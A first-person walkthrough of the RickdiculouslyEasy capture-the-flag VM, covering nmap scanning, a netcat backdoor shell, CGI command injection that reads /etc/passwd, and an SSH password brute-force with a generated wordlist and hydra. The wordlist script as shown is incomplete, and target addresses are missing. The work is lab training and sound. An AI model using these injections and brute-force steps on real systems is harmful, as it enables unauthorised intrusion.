I used Ubuntu server 18.04 as a base for my VM guest OS. I SSHed from the host OS to Ubuntu server VM; from here I tried to break into RickdiculouslyEasy VM.

It would be more convinient to attack the vulnerable vm directly from host os but going through an intermediate vm seems safer. I could create checkpoints to rollback if necessary. My data in host was seperate from vulnerable vm, which might corrupt them. You can never be too careful.


RickdiculouslyEasy VM ip was I could do a ping sweep over host addresses to find the ip of all local VM

nmap -v -sn


Ran nmap against to find all open ports.

# T4: faster scan; T5 is too aggressive
# -Pn: skip host discovery, treats all hosts as live
# -p-: all ports
# -sV: find which services are currently running on found open ports
$ sudo nmap -T4 -v -Pn -p- -sV

21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown


nmap -sC showed that fpt can be signed in without password. Inside, I got 1st flag FLAG{Whoa this is unexpected} - 10 Points

cockpit gave FLAG {There is no Zeus, in your face!} - 10 Points. The login page was broken so there was nothing else to do here.

nc gave FLAG:{TheyFoundMyBackDoorMorty}-10Points. provided a hint that it’s a shell. Used nc to connect and there was a flag file inside FLAG{Flip the pickle Morty!} - 10 Points.

:80 was just a normal page. gaves links to 3 other webpages The most important link among them is A quick test showed that linux commands can be injected into cgi script.; ls -al lists all files in current dir.

Tried some ls -al, cd and pwd led me to another flag file. FLAG{Yeah d- just don't do it.} - 10 Points

I also found passwords.html which hid winter password in the html comments.; ls -al /etc; more /etc/passwd gave the list of all users.


Port 22 seemed like a fake ssh port while port 22222 is the actual ssh port.

Tried winter password with all found users and it was Summer’s. Inside Summer’s home dir, I got another flag. FLAG{Get off the high road Summer!} - 10 Points

Accessed /home/Morty, there were 2 files, an image and a password-protected zip file. Opening the image with vim, I saw the zip password Meeseek. unzip -c journal.txt.zip gave FLAG: {131333} - 20 Points

Inside /home/RickSanchez, there is a binary file safe which can be read by all but only executed by RickSanchez. cp safe /home/Summer/ copied the file and the new file is owned by Summer.

$ ./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.�	@

brute force

I created a bash file to generate all possible passwords:


band=("The" "Flesh" "Curtains")

for i in {A..Z}
    for j in {0..9}
        for k in "${band[@]}"
            echo $password >> rickpass.txt

Then I used hydra to brute force RickSanchez’s password:

hydra -l RickSanchez -P rickpass.txt ssh://

The password was P7Curtains.

sudo -i to go to /root dir and got the last flag. FLAG: {Ionic Defibrillator} - 30 points